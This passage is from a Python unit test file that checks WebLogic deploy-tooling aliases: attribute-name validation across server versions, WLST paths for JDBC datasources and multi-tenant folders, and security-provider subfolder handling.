    self.assertEqual(self.aliases.get_wlst_attribute_name(topic_location, attr_name), 'SafExportPolicy')
    self.assertEqual(self.online_aliases.get_wlst_attribute_name(topic_location, attr_name), 'SAFExportPolicy')
    return
def testIsWlstModelAttributeName(self):
    """Exercise is_valid_model_attribute_name for INVALID, VALID, and
    VERSION_INVALID results against WLS 10.3.6 aliases, checking that each
    result carries the matching WLSDPLY message."""
    wls_version = '10.3.6'
    online_aliases = Aliases(self.model_context, WlstModes.ONLINE, wls_version)
    location = get_jdbc_driver_params_location('my-datasource', self.aliases)
    model_attribute_name = 'QosDegradationAllowed'
    path = self.aliases.get_model_folder_path(location)
    # expect INVALID with the WLSDPLY-08408 message for this attribute/path/version
    expected = exception_helper.get_message('WLSDPLY-08408', model_attribute_name, path, wls_version)
    result, message = online_aliases.is_valid_model_attribute_name(location, model_attribute_name)
    self.assertEqual(result, ValidationCodes.INVALID)
    self.assertEqual(message, expected)
    offline_aliases = Aliases(self.model_context, WlstModes.OFFLINE, wls_version)
    location.pop_location()
    location.append_location(FOLDERS.JDBC_ORACLE_PARAMS)
    add_default_token_value(location, self.aliases)
    model_attribute_name = 'OnsWalletPasswordEncrypted'
    path = self.aliases.get_model_folder_path(location)
    # expect VALID, but still accompanied by the WLSDPLY-08407 message
    expected = exception_helper.get_message('WLSDPLY-08407', model_attribute_name, path, wls_version)
    result, message = offline_aliases.is_valid_model_attribute_name(location, model_attribute_name)
    self.assertEqual(result, ValidationCodes.VALID)
    self.assertEqual(message, expected)
    location.pop_location()
    location.append_location(FOLDERS.JDBC_CONNECTION_POOL_PARAMS)
    add_default_token_value(location, self.aliases)
    model_attribute_name = 'CountOfTestFailuresTillFlush'
    earliest_version = '12.1.2'
    path = self.aliases.get_model_folder_path(location)
    # expect VERSION_INVALID: attribute exists but only from earliest_version onward
    expected = exception_helper.get_message('WLSDPLY-08207', model_attribute_name, path,
                                            wls_version, earliest_version)
    result, message = online_aliases.is_valid_model_attribute_name(location, model_attribute_name)
    self.assertEqual(result, ValidationCodes.VERSION_INVALID)
    self.assertEqual(message, expected)
    return
def testPropertyTypes(self):
    """Both a delimited string and a dict convert to java.util.Properties."""
    expected = Properties()
    for index in (1, 2, 3):
        expected.put('key%d' % index, 'val%d' % index)
    # delimited-string form
    result = TypeUtils.convertToType('properties', 'key1=val1, key2=val2, key3=val3')
    self.assertEqual(expected, result)
    # dict form; compare entry-by-entry via the map helper
    result = TypeUtils.convertToType('properties', {"key1": "val1", "key2": "val2", "key3": "val3"})
    self._assertMapEqual(expected, result)
    return
def testNewGetWlstPaths(self):
    """Verify the four WLST path flavors (attributes, subfolders, list, create)
    for JDBC driver params and for its nested Properties/Property folder."""
    attr_expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource/JDBCDriverParams/NO_NAME_0'
    folder_expected = attr_expected
    list_expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource/JDBCDriverParams'
    create_expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource'
    location = get_jdbc_driver_params_location('my-datasource', self.aliases)
    result = self.aliases.get_wlst_attributes_path(location)
    self.assertEqual(result, attr_expected)
    result = self.aliases.get_wlst_subfolders_path(location)
    self.assertEqual(result, folder_expected)
    result = self.aliases.get_wlst_list_path(location)
    self.assertEqual(result, list_expected)
    result = self.aliases.get_wlst_create_path(location)
    self.assertEqual(result, create_expected)
    # descend into the driver params Properties/Property/user folder and re-check
    attr_expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource/JDBCDriverParams' \
                    '/NO_NAME_0/Properties/NO_NAME_0/Property/user'
    folder_expected = attr_expected
    list_expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource/JDBCDriverParams' \
                    '/NO_NAME_0/Properties/NO_NAME_0/Property'
    create_expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource/JDBCDriverParams' \
                      '/NO_NAME_0/Properties/NO_NAME_0'
    add_jdbc_params_properties(location, self.aliases)
    token = self.aliases.get_name_token(location)
    if token:
        location.add_name_token(token, 'user')
    result = self.aliases.get_wlst_attributes_path(location)
    self.assertEqual(result, attr_expected)
    result = self.aliases.get_wlst_subfolders_path(location)
    self.assertEqual(result, folder_expected)
    result = self.aliases.get_wlst_list_path(location)
    self.assertEqual(result, list_expected)
    result = self.aliases.get_wlst_create_path(location)
    self.assertEqual(result, create_expected)
    return
def testVersionFilteredFolders(self):
    """Partition and Cluster/DynamicServers folders are absent (None MBean type)
    in 10.3.6 aliases but present in 12.2.1.3 aliases."""
    old_wls_version = '10.3.6'
    new_wls_version = '12.2.1.3'
    old_aliases = Aliases(self.model_context, WlstModes.OFFLINE, old_wls_version)
    new_aliases = Aliases(self.model_context, WlstModes.OFFLINE, new_wls_version)
    location = LocationContext()
    location.append_location(FOLDERS.PARTITION)
    mbean_type = old_aliases.get_wlst_mbean_type(location)
    self.assertEqual(mbean_type, None, 'expected Partition type to be null')
    mbean_type = new_aliases.get_wlst_mbean_type(location)
    self.assertNotEqual(mbean_type, None, 'expected Partition type not to be null')
    # replace Partition with Cluster/DynamicServers and repeat the check
    location.pop_location()
    location.append_location(FOLDERS.CLUSTER)
    location.append_location(FOLDERS.DYNAMIC_SERVERS)
    mbean_type = old_aliases.get_wlst_mbean_type(location)
    self.assertEqual(mbean_type, None, 'expected DynamicServers type to be null')
    mbean_type = new_aliases.get_wlst_mbean_type(location)
    self.assertNotEqual(mbean_type, None, 'expected DynamicServers type not to be null')
    return
def testVersionFilteredFoldersWithFolderParams(self):
    """The SAF agent message-log folder resolves to no MBean type in 10.3.6
    aliases but to a real type in 12.2.1.3 aliases."""
    aliases_10g = Aliases(self.model_context, WlstModes.OFFLINE, '10.3.6')
    aliases_12c = Aliases(self.model_context, WlstModes.OFFLINE, '12.2.1.3')
    log_location = LocationContext()
    log_location.append_location(FOLDERS.SAF_AGENT)
    log_location.add_name_token(aliases_10g.get_name_token(log_location), 'SafAgent')
    log_location.append_location(FOLDERS.SAF_MESSAGE_LOG_FILE)
    self.assertEqual(aliases_10g.get_wlst_mbean_type(log_location), None,
                     'expected SAF Agent Message Log type to be null')
    self.assertNotEqual(aliases_12c.get_wlst_mbean_type(log_location), None,
                        'expected SAF Agent Message Log not to be null')
    return
def testDomainAttributeMethods(self):
    """Smoke-test attribute-name queries at the domain (root) location."""
    aliases = Aliases(self.model_context, WlstModes.OFFLINE)
    location = LocationContext()
    get_required_attributes = aliases.get_wlst_get_required_attribute_names(location)
    self.assertNotEqual(get_required_attributes, None, 'expected get-required attributes to not be None')
    # NOTE(review): this calls get_wlst_get_required_attribute_names a second time even
    # though the variable and message say "restart-required" -- looks like a copy-paste
    # bug; confirm the intended restart-required API on Aliases and update this call.
    restart_required_attributes = aliases.get_wlst_get_required_attribute_names(location)
    self.assertNotEqual(restart_required_attributes, None, 'expected restart-required attributes to not be None')
    return
def testMTAliasLoading(self):
    """Verify WLST paths for JDBC driver params at the domain level and nested
    under ResourceGroupTemplate, ResourceGroup, and Partition/ResourceGroup
    (the multi-tenant folder hierarchies)."""
    aliases = Aliases(self.model_context, WlstModes.OFFLINE)
    # domain-level JDBC driver params
    attr_expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource/JDBCDriverParams/NO_NAME_0'
    folder_expected = attr_expected
    list_expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource/JDBCDriverParams'
    create_expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource'
    location = get_jdbc_driver_params_location('my-datasource', self.aliases)
    result = aliases.get_wlst_attributes_path(location)
    self.assertEqual(result, attr_expected)
    result = aliases.get_wlst_subfolders_path(location)
    self.assertEqual(result, folder_expected)
    result = aliases.get_wlst_list_path(location)
    self.assertEqual(result, list_expected)
    result = aliases.get_wlst_create_path(location)
    self.assertEqual(result, create_expected)
    # same datasource nested under a ResourceGroupTemplate
    attr_expected = '/ResourceGroupTemplate/MyResourceGroupTemplate/JDBCSystemResource/my-datasource' \
                    '/JdbcResource/my-datasource/JDBCDriverParams/NO_NAME_0'
    folder_expected = attr_expected
    list_expected = '/ResourceGroupTemplate/MyResourceGroupTemplate/JDBCSystemResource/my-datasource' \
                    '/JdbcResource/my-datasource/JDBCDriverParams'
    create_expected = '/ResourceGroupTemplate/MyResourceGroupTemplate/JDBCSystemResource/my-datasource' \
                      '/JdbcResource/my-datasource'
    location = LocationContext()
    location.append_location(FOLDERS.RESOURCE_GROUP_TEMPLATE)
    token = self.aliases.get_name_token(location)
    if token:
        location.add_name_token(token, 'MyResourceGroupTemplate')
    location.append_location(FOLDERS.JDBC_SYSTEM_RESOURCE)
    location.add_name_token(self.aliases.get_name_token(location), 'my-datasource')
    location.append_location(FOLDERS.JDBC_RESOURCE)
    add_default_token_value(location, self.aliases)
    location.append_location(FOLDERS.JDBC_DRIVER_PARAMS)
    add_default_token_value(location, self.aliases)
    result = aliases.get_wlst_attributes_path(location)
    self.assertEqual(result, attr_expected)
    result = aliases.get_wlst_subfolders_path(location)
    self.assertEqual(result, folder_expected)
    result = aliases.get_wlst_list_path(location)
    self.assertEqual(result, list_expected)
    result = aliases.get_wlst_create_path(location)
    self.assertEqual(result, create_expected)
    # same datasource nested under a ResourceGroup
    attr_expected = '/ResourceGroup/MyResourceGroup/JDBCSystemResource/my-datasource/JdbcResource' \
                    '/my-datasource/JDBCDriverParams/NO_NAME_0'
    folder_expected = attr_expected
    list_expected = '/ResourceGroup/MyResourceGroup/JDBCSystemResource/my-datasource/JdbcResource' \
                    '/my-datasource/JDBCDriverParams'
    create_expected = '/ResourceGroup/MyResourceGroup/JDBCSystemResource/my-datasource/JdbcResource/my-datasource'
    location = LocationContext()
    location.append_location(FOLDERS.RESOURCE_GROUP)
    token = self.aliases.get_name_token(location)
    if token:
        location.add_name_token(token, 'MyResourceGroup')
    location.append_location(FOLDERS.JDBC_SYSTEM_RESOURCE)
    location.add_name_token(self.aliases.get_name_token(location), 'my-datasource')
    location.append_location(FOLDERS.JDBC_RESOURCE)
    add_default_token_value(location, self.aliases)
    location.append_location(FOLDERS.JDBC_DRIVER_PARAMS)
    add_default_token_value(location, self.aliases)
    result = aliases.get_wlst_attributes_path(location)
    self.assertEqual(result, attr_expected)
    result = aliases.get_wlst_subfolders_path(location)
    self.assertEqual(result, folder_expected)
    result = aliases.get_wlst_list_path(location)
    self.assertEqual(result, list_expected)
    result = aliases.get_wlst_create_path(location)
    self.assertEqual(result, create_expected)
    # same datasource nested under a Partition's ResourceGroup
    attr_expected = '/Partition/MyPartition/ResourceGroup/MyResourceGroup/JDBCSystemResource' \
                    '/my-datasource/JdbcResource/my-datasource/JDBCDriverParams/NO_NAME_0'
    folder_expected = attr_expected
    list_expected = '/Partition/MyPartition/ResourceGroup/MyResourceGroup/JDBCSystemResource' \
                    '/my-datasource/JdbcResource/my-datasource/JDBCDriverParams'
    create_expected = '/Partition/MyPartition/ResourceGroup/MyResourceGroup/JDBCSystemResource' \
                      '/my-datasource/JdbcResource/my-datasource'
    location = LocationContext()
    location.append_location(FOLDERS.PARTITION)
    token = self.aliases.get_name_token(location)
    if token:
        location.add_name_token(token, 'MyPartition')
    location.append_location(FOLDERS.RESOURCE_GROUP)
    token = self.aliases.get_name_token(location)
    if token:
        location.add_name_token(token, 'MyResourceGroup')
    location.append_location(FOLDERS.JDBC_SYSTEM_RESOURCE)
    location.add_name_token(self.aliases.get_name_token(location), 'my-datasource')
    location.append_location(FOLDERS.JDBC_RESOURCE)
    add_default_token_value(location, self.aliases)
    location.append_location(FOLDERS.JDBC_DRIVER_PARAMS)
    add_default_token_value(location, self.aliases)
    result = aliases.get_wlst_attributes_path(location)
    self.assertEqual(result, attr_expected)
    result = aliases.get_wlst_subfolders_path(location)
    self.assertEqual(result, folder_expected)
    result = aliases.get_wlst_list_path(location)
    self.assertEqual(result, list_expected)
    result = aliases.get_wlst_create_path(location)
    self.assertEqual(result, create_expected)
    return
def testChildNodeTypes(self):
    """Verify naming behavior for the different child-node types: SelfTuning
    (single, unpredictable name), WorkManager (multiple instances), and
    WorkManagerShutdownTrigger (single instance)."""
    location = LocationContext()
    location.append_location(FOLDERS.SELF_TUNING)
    result = self.aliases.requires_unpredictable_single_name_handling(location)
    self.assertEqual(result, True)
    result = self.aliases.supports_multiple_mbean_instances(location)
    self.assertEqual(result, False)
    name_token = self.aliases.get_name_token(location)
    self.assertEqual(name_token, 'SELFTUNING')
    location.add_name_token("DOMAIN", 'mydomain')
    # offline uses the NO_NAME_0 placeholder; online uses the domain name
    mbean_name = self.aliases.get_wlst_mbean_name(location)
    self.assertEqual(mbean_name, 'NO_NAME_0')
    mbean_name = self.online_aliases.get_wlst_mbean_name(location)
    self.assertEqual(mbean_name, 'mydomain')
    # WorkManager supports multiple named instances in both modes
    location.append_location(FOLDERS.WORK_MANAGER)
    result = self.aliases.requires_unpredictable_single_name_handling(location)
    self.assertEqual(result, False)
    result = self.aliases.supports_multiple_mbean_instances(location)
    self.assertEqual(result, True)
    name_token = self.aliases.get_name_token(location)
    self.assertEqual(name_token, 'WORKMANAGER')
    location.add_name_token(name_token, 'MyWorkManager')
    mbean_name = self.aliases.get_wlst_mbean_name(location)
    self.assertEqual(mbean_name, 'MyWorkManager')
    mbean_name = self.online_aliases.get_wlst_mbean_name(location)
    self.assertEqual(mbean_name, 'MyWorkManager')
    # the shutdown trigger is a single child: placeholder name offline, parent name online
    location.append_location('WorkManagerShutdownTrigger')
    location.add_name_token(self.aliases.get_name_token(location), 'MyWorkManager')
    result = self.aliases.supports_multiple_mbean_instances(location)
    self.assertEqual(result, False)
    name_token = self.aliases.get_name_token(location)
    self.assertEqual(name_token, 'WORKMANAGERSHUTDOWNTRIGGER')
    mbean_name = self.aliases.get_wlst_mbean_name(location)
    self.assertEqual(mbean_name, 'NO_NAME_0')
    mbean_name = self.online_aliases.get_wlst_mbean_name(location)
    self.assertEqual(mbean_name, 'MyWorkManager')
    # security Group folder supports multiple instances
    location = LocationContext().append_location(FOLDERS.SECURITY, FOLDERS.GROUP, DOMAIN='mydomain')
    result = self.aliases.supports_multiple_mbean_instances(location)
    self.assertEqual(result, True)
    return
def testFlattenedFolders(self):
    """Verify flattened-folder info and WLST list/create paths for the JDBC
    driver params Properties folder."""
    location = get_jdbc_params_properties_location('my-datasource', self.aliases)
    flattened_info = self.aliases.get_wlst_flattened_folder_info(location)
    online_flattened_info = self.online_aliases.get_wlst_flattened_folder_info(location)
    self.assertNotEqual(flattened_info, None)
    name = flattened_info.get_mbean_name()
    online_name = online_flattened_info.get_mbean_name()
    # renamed from 'type' to avoid shadowing the builtin
    mbean_type = flattened_info.get_mbean_type()
    # offline uses the NO_NAME_0 placeholder; online uses the datasource name
    self.assertEqual(name, 'NO_NAME_0')
    self.assertEqual(online_name, 'my-datasource')
    self.assertEqual(mbean_type, 'Properties')
    expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource/JDBCDriverParams/NO_NAME_0/Properties'
    result = self.aliases.get_wlst_flattened_folder_list_path(location)
    self.assertEqual(result, expected)
    expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource/JDBCDriverParams/NO_NAME_0'
    result = self.aliases.get_wlst_flattened_folder_create_path(location)
    self.assertEqual(result, expected)
    return
def testModelFolderPath(self):
    """Verify model folder paths, including section prefixes (resources:,
    topology:) and the artificial security-provider subfolder."""
    location = get_jdbc_params_properties_location('my-datasource', self.aliases)
    expected = 'resources:/JDBCSystemResource/my-datasource/JdbcResource/JDBCDriverParams/Properties'
    path = self.aliases.get_model_folder_path(location)
    self.assertEqual(path, expected)
    # adding the property name token extends the path by one segment
    token_name = self.aliases.get_name_token(location)
    if token_name is not None:
        location.add_name_token(token_name, 'user')
    expected = 'resources:/JDBCSystemResource/my-datasource/JdbcResource/JDBCDriverParams/Properties/user'
    path = self.aliases.get_model_folder_path(location)
    self.assertEqual(path, expected)
    expected = 'topology:/SecurityConfiguration/Realm/myrealm/AuthenticationProvider/' \
               'MyLDAPAuthentication/LDAPAuthenticator'
    # Test artificial folder for security providers
    location = LocationContext().append_location(FOLDERS.SECURITY_CONFIGURATION)
    token_name = self.aliases.get_name_token(location)
    if token_name is not None:
        location.add_name_token(token_name, 'mydomain')
    location.append_location(FOLDERS.REALM)
    token_name = self.aliases.get_name_token(location)
    if token_name is not None:
        location.add_name_token(token_name, 'myrealm')
    location.append_location(FOLDERS.AUTHENTICATION_PROVIDER)
    token_name = self.aliases.get_name_token(location)
    if token_name is not None:
        location.add_name_token(token_name, 'MyLDAPAuthentication')
    location.append_location(FOLDERS.LDAP_AUTHENTICATOR)
    result = self.aliases.get_model_folder_path(location)
    self.assertEqual(result, expected)
    return
def testIsValidModelFolderName(self):
    """Folder-name validation returns VALID, VERSION_INVALID, or INVALID, and
    every advertised top-level topology folder validates."""
    root_location = LocationContext()
    code, _ = self.aliases.is_valid_model_folder_name(root_location, 'ServerTemplate')
    self.assertEqual(code, ValidationCodes.VALID)
    # same folder against 12.1.1 aliases is version-invalid
    old_aliases = Aliases(self.model_context, wls_version='12.1.1')
    code, _ = old_aliases.is_valid_model_folder_name(root_location, 'ServerTemplate')
    self.assertEqual(code, ValidationCodes.VERSION_INVALID)
    # a misspelled folder name is invalid outright
    code, _ = self.aliases.is_valid_model_folder_name(root_location, 'ServerTemplates')
    self.assertEqual(code, ValidationCodes.INVALID)
    for folder_name in self.aliases.get_model_topology_top_level_folder_names():
        code, _ = self.aliases.is_valid_model_folder_name(root_location, folder_name)
        self.assertEqual(code, ValidationCodes.VALID)
    return
def testBooleanDefaultValues(self):
    """A boolean WLST value equal to its default maps to a None model value."""
    rms_location = LocationContext().append_location(FOLDERS.RESTFUL_MANAGEMENT_SERVICES, DOMAIN='mydomain')
    model_name, model_value = \
        self.aliases.get_model_attribute_name_and_value(rms_location, 'JavaServiceResourcesEnabled', 'false')
    self.assertEqual(model_name, 'JavaServiceResourcesEnabled')
    self.assertEqual(model_value, None)
    return
def testGetWlstAttributeJavaBoolean(self):
    """A model boolean string converts to a java.lang.Boolean WLST value."""
    provider_location = LocationContext().append_location(FOLDERS.SECURITY_CONFIGURATION)
    provider_location.add_name_token(self.aliases.get_name_token(provider_location), 'my-domain')
    provider_location.append_location(FOLDERS.REALM, REALM="myrealm"). \
        append_location(FOLDERS.AUTHENTICATION_PROVIDER, PROVIDER='myprovider'). \
        append_location(FOLDERS.ACTIVE_DIRECTORY_AUTHENTICATOR)
    wlst_name, wlst_value = self.aliases.get_wlst_attribute_name_and_value(
        provider_location, 'UseRetrievedUserNameAsPrincipal', 'true')
    self.assertEqual(wlst_name, 'UseRetrievedUserNameAsPrincipal')
    self.assertEqual(wlst_value, Boolean('true'))
    return
def testGetWlstAttributeJavaBooleanNewIssue157(self):
    """Regression check (issue 157): another provider boolean attribute also
    converts to a java.lang.Boolean WLST value."""
    provider_location = LocationContext().append_location(FOLDERS.SECURITY_CONFIGURATION)
    provider_location.add_name_token(self.aliases.get_name_token(provider_location), 'my-domain')
    provider_location.append_location(FOLDERS.REALM, REALM="myrealm"). \
        append_location(FOLDERS.AUTHENTICATION_PROVIDER, PROVIDER='myprovider'). \
        append_location(FOLDERS.ACTIVE_DIRECTORY_AUTHENTICATOR)
    wlst_name, wlst_value = self.aliases.get_wlst_attribute_name_and_value(
        provider_location, 'UseTokenGroupsForGroupMembershipLookup', 'true')
    self.assertEqual(wlst_name, 'UseTokenGroupsForGroupMembershipLookup')
    self.assertEqual(wlst_value, Boolean('true'))
    return
def testSecurityProviderTypeHandling(self):
    """The AUTHENTICATION_PROVIDER folder requires artificial-subfolder handling;
    asking again on a concrete provider subfolder raises AliasException."""
    location = LocationContext().append_location(FOLDERS.SECURITY_CONFIGURATION)
    token = self.aliases.get_name_token(location)
    location.add_name_token(token, 'my-domain')
    location.append_location(FOLDERS.REALM)
    token = self.aliases.get_name_token(location)
    location.add_name_token(token, 'myrealm')
    location.append_location(FOLDERS.AUTHENTICATION_PROVIDER)
    result = self.aliases.requires_artificial_type_subfolder_handling(location)
    self.assertEqual(result, True)
    location.append_location(FOLDERS.DEFAULT_AUTHENTICATOR)
    try:
        self.aliases.requires_artificial_type_subfolder_handling(location)
        # fixed typo ('Excepted') and replaced assertEqual(True, False, msg) with fail()
        self.fail('Expected AliasException to be thrown')
    except AliasException:
        # expected path: the concrete provider subfolder is rejected
        pass
    return
def testSecurityProviderGetAttributes(self):
    """Map a provider MBean class name to its model subfolder and read an
    attribute through the resulting location."""
    location = LocationContext().append_location(FOLDERS.SECURITY_CONFIGURATION)
    token = self.aliases.get_name_token(location)
    location.add_name_token(token, 'my-domain')
    location.append_location(FOLDERS.REALM)
    token = self.aliases.get_name_token(location)
    location.add_name_token(token, 'myrealm')
    location.append_location(FOLDERS.AUTHENTICATION_PROVIDER)
    token = self.aliases.get_name_token(location)
    location.add_name_token(token, 'MyDefaultAuthenticator')
    model_subfolder_name = self.aliases.get_model_subfolder_name(location,
        'weblogic.security.providers.authentication.DefaultAuthenticatorMBean')
    self.assertEqual(model_subfolder_name, 'DefaultAuthenticator')
    # the artificial subfolder does not add a segment to the WLST path
    location.append_location(model_subfolder_name)
    result = self.aliases.get_wlst_attributes_path(location)
    self.assertEqual(result,
                     '/SecurityConfiguration/my-domain/Realm/myrealm/AuthenticationProvider/MyDefaultAuthenticator')
    model_name, model_value = self.aliases.get_model_attribute_name_and_value(location, 'CompatibilityObjectName',
                                                                              'MyObjectName')
    self.assertEqual(model_name, 'CompatibilityObjectName')
    # was deprecated assertEquals; assertEqual for consistency with the rest of the file
    self.assertEqual(model_value, 'MyObjectName')
    return
def testJrfSecurityProviderDiscovery(self):
    """A SAML authenticator MBean class maps to the SAMLAuthenticator subfolder."""
    provider_location = LocationContext().append_location(FOLDERS.SECURITY_CONFIGURATION)
    provider_location.add_name_token(self.aliases.get_name_token(provider_location), 'my-domain')
    provider_location.append_location(FOLDERS.REALM)
    provider_location.add_name_token(self.aliases.get_name_token(provider_location), 'myrealm')
    provider_location.append_location(FOLDERS.AUTHENTICATION_PROVIDER)
    provider_location.add_name_token(self.aliases.get_name_token(provider_location), 'myprovider')
    subfolder_name = self.aliases.get_model_subfolder_name(
        provider_location, 'weblogic.security.providers.saml.SAMLAuthenticatorMBean')
    self.assertEqual(subfolder_name, 'SAMLAuthenticator')
    return
def testUsesPathTokenAttributeNames(self):
    """The Application folder reports exactly the expected set of
    uses-path-tokens attribute names."""
    location = LocationContext().append_location(FOLDERS.APPLICATION)
    token = self.aliases.get_name_token(location)
    location.add_name_token(token, 'my-app')
    expected = ['PlanPath', 'SourcePath', 'AltDescriptorPath', 'AltWLSDescriptorPath',
                'InstallDir', 'PlanDir', 'AltDescriptorDir']
    result = self.aliases.get_model_uses_path_tokens_attribute_names(location)
    self.assertNotEqual(result, None, 'expected uses_path_tokens attribute names list to not be None')
    self.assertEqual(len(result), len(expected))
    for name in result:
        if name not in expected:
            # replaced the assertEqual(True, False, msg) idiom with fail()
            self.fail("attribute name %s not in the list of expected names" % name)
    return
def testDefaultValueStringCompares(self):
    """Both the empty string and None match the Notes default, yielding a
    None model value."""
    server_location = LocationContext().append_location(FOLDERS.SERVER)
    server_location.add_name_token(self.aliases.get_name_token(server_location), 'AdminServer')
    for wlst_value in ('', None):
        model_name, model_value = \
            self.aliases.get_model_attribute_name_and_value(server_location, 'Notes', wlst_value)
        self.assertEqual(model_name, 'Notes')
        self.assertEqual(model_value, None)
    return
def _assertMapEqual(self, expected, testObject):
    """Assert two java.util.Map-like objects have the same size and entries.

    The key is stripped before lookup in testObject -- presumably to tolerate
    whitespace left by delimited-string parsing; confirm against the callers.
    """
    self.assertEqual(expected.size(), testObject.size())
    for key in expected.keys():
        self.assertEqual(expected.get(key), testObject.get(str(key).strip()))
    return
def testIssue36Fix(self):
    """Under each resource-manager child folder, the Trigger MBean type is the
    singular name offline and the pluralized name online."""
    base_location = LocationContext().append_location(FOLDERS.RESOURCE_MANAGER)
    base_token = self.aliases.get_name_token(base_location)
    base_location.add_name_token(base_token, 'ResourceManager-0')
    # [offline expectation, online expectation]
    expected = [FOLDERS.TRIGGER, '%ss' % FOLDERS.TRIGGER]
    child_folders = [
        (FOLDERS.CPU_UTILIZATION, 'CpuUtilization-0'),
        (FOLDERS.FILE_OPEN, 'FileOpen-0'),
        (FOLDERS.HEAP_RETAINED, 'HeapRetained-0'),
    ]
    for child_folder, child_name in child_folders:
        location = LocationContext(base_location).append_location(child_folder)
        token = self.aliases.get_name_token(location)
        location.add_name_token(token, child_name)
        location.append_location(FOLDERS.TRIGGER)
        token = self.aliases.get_name_token(location)
        location.add_name_token(token, 'Trigger-0')
        self.assertEqual(self.aliases.get_wlst_mbean_type(location), expected[0])
        self.assertEqual(self.online_aliases.get_wlst_mbean_type(location), expected[1])
    return
def testIssue37Fix(self):
    """Verify the WLST mbean type of HeapDumpAction under a WLDF WatchNotification."""
    location = LocationContext().append_location(FOLDERS.WLDF_SYSTEM_RESOURCE)
    location.add_name_token(self.aliases.get_name_token(location), 'WLDFSystemResource-0')
    location.append_location(FOLDERS.WLDF_RESOURCE)
    location.append_location(FOLDERS.WATCH_NOTIFICATION)
    location.add_name_token(self.aliases.get_name_token(location), 'WatchNotification-0')
    location.append_location(FOLDERS.HEAP_DUMP_ACTION)
    location.add_name_token(self.aliases.get_name_token(location), 'HeapDumpAction-0')
    # Offline type is the bare folder name; online type carries a trailing 's'.
    self.assertEqual(self.aliases.get_wlst_mbean_type(location), FOLDERS.HEAP_DUMP_ACTION)
    self.assertEqual(self.online_aliases.get_wlst_mbean_type(location), '%ss' % FOLDERS.HEAP_DUMP_ACTION)
    return
def testIssue38Fix(self):
    """Verify WLST mbean types and WLST paths for PartitionWorkManager under Partition.

    Fix: the comment on the offline wlst_subfolders_path check previously claimed a
    trailing 's' on FOLDERS.PARTITION, contradicting the expected value right below it.
    """
    location = LocationContext().append_location(FOLDERS.PARTITION)
    token = self.aliases.get_name_token(location)
    location.add_name_token(token, 'Partition-0')
    # Check offline value of wlst_mbean_type of FOLDERS.PARTITION
    wlst_mbean_type = self.aliases.get_wlst_mbean_type(location)
    expected = FOLDERS.PARTITION
    self.assertEqual(wlst_mbean_type, expected)
    # Check online value of wlst_mbean_type of FOLDERS.PARTITION.
    # There should be an 's' on the end of FOLDERS.PARTITION
    wlst_mbean_type = self.online_aliases.get_wlst_mbean_type(location)
    expected = '%ss' % FOLDERS.PARTITION
    self.assertEqual(wlst_mbean_type, expected)
    # Add FOLDERS.PARTITION_WORK_MANAGER to the location
    location.append_location(FOLDERS.PARTITION_WORK_MANAGER)
    token = self.aliases.get_name_token(location)
    location.add_name_token(token, 'PartitionWorkManager-0')
    # Check offline value of wlst_mbean_type after adding
    # FOLDERS.PARTITION_WORK_MANAGER to the location. There
    # should not be an 's' on the end of FOLDERS.PARTITION_WORK_MANAGER
    wlst_mbean_type = self.aliases.get_wlst_mbean_type(location)
    expected = FOLDERS.PARTITION_WORK_MANAGER
    self.assertEqual(wlst_mbean_type, expected)
    # Check online value of wlst_mbean_type after adding
    # FOLDERS.PARTITION_WORK_MANAGER to the location. It
    # should be the same value as offline; no 's' on the
    # end of FOLDERS.PARTITION_WORK_MANAGER
    wlst_mbean_type = self.online_aliases.get_wlst_mbean_type(location)
    self.assertEqual(wlst_mbean_type, expected)
    # Check offline value of wlst_list_path after adding
    # FOLDERS.PARTITION_WORK_MANAGER to the location. There
    # should not be an 's' on the end of FOLDERS.PARTITION or
    # FOLDERS.PARTITION_WORK_MANAGER
    expected = [FOLDERS.PARTITION, 'Partition-0', FOLDERS.PARTITION_WORK_MANAGER]
    wlst_list_path = self.aliases.get_wlst_list_path(location)
    self.assertEqual(wlst_list_path, '/%s' % '/'.join(expected))
    # Check online value of wlst_list_path after adding
    # FOLDERS.PARTITION_WORK_MANAGER to the location. There
    # should be an 's' on the end of FOLDERS.PARTITION, but
    # not on the end of FOLDERS.PARTITION_WORK_MANAGER
    expected = ['%ss' % FOLDERS.PARTITION, 'Partition-0', FOLDERS.PARTITION_WORK_MANAGER]
    wlst_list_path = self.online_aliases.get_wlst_list_path(location)
    self.assertEqual(wlst_list_path, '/%s' % '/'.join(expected))
    # Check offline value of wlst_subfolders_path after adding
    # FOLDERS.PARTITION_WORK_MANAGER to the location. There
    # should not be an 's' on the end of FOLDERS.PARTITION or
    # FOLDERS.PARTITION_WORK_MANAGER
    expected = [FOLDERS.PARTITION, 'Partition-0', FOLDERS.PARTITION_WORK_MANAGER, 'PartitionWorkManager-0']
    wlst_subfolders_path = self.aliases.get_wlst_subfolders_path(location)
    self.assertEqual(wlst_subfolders_path, '/%s' % '/'.join(expected))
    # Check online value of wlst_subfolders_path after adding
    # FOLDERS.PARTITION_WORK_MANAGER to the location. There
    # should be an 's' on the end of FOLDERS.PARTITION, but
    # not on the end of FOLDERS.PARTITION_WORK_MANAGER
    expected = ['%ss' % FOLDERS.PARTITION, 'Partition-0', FOLDERS.PARTITION_WORK_MANAGER, 'PartitionWorkManager-0']
    wlst_subfolders_path = self.online_aliases.get_wlst_subfolders_path(location)
    self.assertEqual(wlst_subfolders_path, '/%s' % '/'.join(expected))
    return
def testIssue39Fix(self):
    """Verify WLST mbean types and WLST paths for ResourceManager under Partition.

    Fix: the comment on the offline wlst_subfolders_path check previously claimed a
    trailing 's' on FOLDERS.PARTITION, contradicting the expected value right below it.
    """
    location = LocationContext().append_location(FOLDERS.PARTITION)
    token = self.aliases.get_name_token(location)
    location.add_name_token(token, 'Partition-0')
    # Check offline value of wlst_mbean_type of FOLDERS.PARTITION
    wlst_mbean_type = self.aliases.get_wlst_mbean_type(location)
    expected = FOLDERS.PARTITION
    self.assertEqual(wlst_mbean_type, expected)
